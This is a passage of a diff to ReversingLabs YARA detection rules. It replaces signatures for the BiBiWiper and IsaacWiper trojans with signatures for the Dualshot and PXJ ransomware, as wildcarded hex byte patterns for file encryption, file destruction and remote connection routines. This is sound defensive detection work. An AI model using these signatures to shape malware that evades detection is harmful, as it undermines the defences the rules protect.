?? 03 C8 - 89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A - ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ?? - 49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF - D0 + $remote_connection_2 = { + BA ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 66 C7 45 ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 55 ?? C6 45 + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 + 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8B D0 C6 45 ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 53 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? + ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 } condition: - uint16(0)==0x5A4D and $entry_setup and ($decrypt_function_snippet or $decrypt_function_snippet_wrapper) + uint16(0)==0x5A4D and $encrypt_files and $remote_connection_1 and $remote_connection_2 } -rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Dualshot : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects BiBiWiper trojan." + description = "Yara rule that detects Dualshot ransomware." author = "ReversingLabs" - id = "c370dde0-71ff-5832-b131-6d61beb02b9b" - date = "2023-11-28" - modified = "2023-11-28" + id = "17828c85-0f1b-581b-842a-24e6f26e0b4d" + date = "2020-11-20" + modified = "2020-11-20" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Linux.Trojan.BiBiWiper.yara#L1-L76" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8f290141d5da660463dede6df571d774448e136e2993a0a4c706245464e1239e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Dualshot.yara#L1-L112" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a401369357901f42ad83227b025d3b14b3acd1f50705da82afbe8e4f85501919" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "BiBiWiper" + tc_detection_type = "Ransomware" + tc_detection_name = "Dualshot" tc_detection_factor = 5 importance = 25 strings: - $destroy_files_p1 = { - 55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 - 95 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 44 89 8D ?? ?? ?? ?? 48 8B - 05 ?? ?? ?? ?? 48 83 C0 ?? 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 BA ?? ?? ?? - ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 89 D0 48 C1 F8 ?? 48 89 CA 48 C1 FA ?? 48 29 D0 - 48 69 D0 ?? ?? ?? ?? 48 89 C8 48 29 D0 48 85 C0 0F 94 C0 84 C0 74 ?? E8 ?? ?? ?? ?? - 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 - D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? - ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 CE 48 89 C7 - E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 - CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? - ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D - 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? - 48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? - ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 - 89 C3 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? - ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 + $internal_encrypt_file = { + 02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 02 28 ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ?? 03 28 + ?? ?? ?? ?? 0D 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 09 16 09 8E 69 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 02 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? + ?? 02 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 00 02 28 ?? ?? ?? ?? DE ?? 26 + DE ?? 2A } - $destroy_files_p2 = { - 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? - ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C1 E0 ?? 48 89 45 ?? 48 8B B5 ?? ?? ?? ?? 48 8B 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? 48 F7 F6 48 8B 55 ?? 48 29 D0 48 89 45 ?? 83 BD ?? ?? ?? ?? - ?? 7E ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 48 98 48 0F AF 45 ?? BA ?? ?? ?? ?? 48 F7 B5 ?? - ?? ?? ?? 48 89 D0 48 89 C1 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 - ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? - ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 39 - 85 ?? ?? ?? ?? 73 ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? - 48 29 D0 48 89 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89 - C7 E8 ?? ?? ?? ?? 48 8B 00 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 - ?? 48 8B 45 ?? 89 C2 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 5D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 + $encrypt_files_p1 = { + 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? + 8E 69 32 ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 + ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? + 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? + ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 11 + ?? 6F ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 1F ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 + ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 72 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? + ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 11 ?? + 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? + 26 DE ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 11 ?? + A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 2C ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F + ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 11 ?? + 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A } - $destroy_files_p3 = { - 89 C7 48 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 85 - ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 C2 48 - 8B 45 ?? 48 01 D0 48 39 85 ?? ?? ?? ?? 73 ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 29 - D0 48 8B 55 ?? 48 29 D0 48 89 45 ?? 48 83 7D ?? ?? 7E ?? 48 8B 4D ?? 48 8B 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 48 98 48 - 39 85 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? EB ?? 90 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 - 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 - C7 E8 ?? ?? ?? ?? 83 FB ?? E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 - ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 - C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 - 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 - C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? - 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? - ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 8B 5D ?? C9 C3 + $encrypt_files_p2 = { + 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 17 9A 28 ?? ?? ?? ?? 13 ?? 02 + 18 9A 28 ?? ?? ?? ?? 2C ?? 02 18 9A 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 02 18 9A 1B 19 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 18 + 9A 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 2A 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 12 ?? 6F ?? ?? ?? ?? 26 07 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 18 8D ?? ?? + ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 00 + 1B 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 08 20 ?? ?? ?? + ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 + 25 1A 11 ?? 08 11 ?? 8E 69 6F ?? ?? ?? ?? 9A A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 11 ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F + ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 + ?? 1F ?? 3F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 17 + 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 2A + } + $find_files_p1 = { + 73 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 16 28 ?? ?? + ?? ?? 02 8E 39 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 16 0D + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 17 0D 20 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 1F ?? 1B 28 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 13 ?? 6F ?? ?? ?? ?? 13 ?? 28 + ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 11 ?? 16 11 + ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 13 ?? 1C 8D ?? ?? ?? ?? 25 16 + 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? + A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 13 ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 + ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 + 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 72 ?? ?? + ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72 + } + $find_files_p2 = { + A2 13 ?? 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 1C 32 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? + 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? + 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 13 ?? + 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 2C ?? 12 ?? 11 ?? 8E 69 17 58 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 6F ?? ?? ?? ?? 11 ?? + A2 2B } condition: - uint32(0)==0x464C457F and ( all of ($destroy_files_p*)) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($internal_encrypt_file) } -rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_PXJ : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects IsaacWiper trojan." + description = "Yara rule that detects PXJ ransomware." author = "ReversingLabs" - id = "c0924e5e-a942-57a3-a9f9-e6be6efa4c73" - date = "2022-03-02" - modified = "2022-03-02" + id = "c1549905-5b31-55c0-a275-0ab8133b3504" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.IsaacWiper.yara#L1-L76" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c9fa43f44c33816a66f61255d101294da63df1afc5a27ed5817072040cd1eec5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.PXJ.yara#L1-L158" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e88d27dcd7ad3af459bd7e34fcc827822365441446b0e4e7bbec399c9a948cb7" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "IsaacWiper" + tc_detection_type = "Ransomware" + tc_detection_name = "PXJ" tc_detection_factor = 5 importance = 25 strings: - $enumerate_physical_drives = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 F6 89 55 ?? 57 89 4D ?? B3 ?? C7 45 ?? ?? ?? ?? - ?? 89 75 ?? 84 DB 0F 84 ?? ?? ?? ?? 8B D6 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? - ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D - 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 89 45 ?? 2B F8 83 C4 ?? 66 83 7D ?? ?? 8D 0C 41 8D 45 - ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D 04 45 ?? ?? ?? ?? 50 8B - C2 8D 14 3F 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C7 8D 48 ?? 0F 46 C1 8B 4D ?? 03 C8 - 89 4D ?? 83 F9 ?? 73 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 50 B3 ?? FF D7 83 F8 ?? 74 ?? 46 50 89 75 ?? FF 15 ?? ?? ?? ?? - E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 32 DB E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 - ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 85 C0 0F 95 C1 66 85 C0 0F 84 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? D1 E8 8D 4D ?? BE ?? ?? ?? ?? 89 45 ?? 2B F0 83 C4 ?? 66 83 - 7D ?? ?? 8D 0C 41 8D 45 ?? 74 ?? 83 C0 ?? 66 83 38 ?? 75 ?? 8D 55 ?? 2B C2 D1 F8 8D - 04 45 ?? ?? ?? ?? 50 8B C2 8D 14 36 50 E8 ?? ?? ?? ?? D1 E8 83 C4 ?? 3B C6 8D 48 ?? - 0F 46 C1 8B 4D ?? 03 C8 89 4D ?? 83 F9 ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF D7 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 - ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? - ?? ?? ?? 83 F8 ?? 0F 94 C3 75 ?? 33 C0 83 7D ?? ?? 0F 44 45 ?? 89 45 ?? 56 FF 15 ?? - ?? ?? ?? 84 DB EB ?? 84 C9 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B D3 8B 4D ?? 6A ?? E8 ?? ?? - ?? ?? 8B 7D ?? 8A C8 83 C4 ?? 33 F6 84 C9 74 ?? 3B F3 74 ?? 6A ?? 8B D6 8B CF E8 ?? - ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 46 84 C9 74 ?? 8B 5D ?? 3B F3 73 ?? - 6A ?? 8B D6 8B CF E8 ?? ?? ?? ?? 8A C8 83 C4 ?? 46 83 C7 ?? 84 C9 75 ?? 8A C1 5F 5E - 5B 8B E5 5D C3 + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 68 ?? ?? ?? ?? + 33 F6 8D 8D ?? ?? ?? ?? 33 C0 56 51 89 9D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? + ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? + ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 53 8D 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 ?? ?? + ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B + 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? + 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 } - $corrupt_drive_thread = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B 5D ?? 56 57 85 DB 0F 84 ?? ?? - ?? ?? 83 7B ?? ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 8D 4C 24 ?? 03 C0 BA ?? ?? ?? ?? 50 53 - E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? D1 E8 33 C9 66 89 4C 44 ?? 8D 44 24 ?? 50 - FF D7 8B 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 6A ?? 8D 44 24 ?? 50 - FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 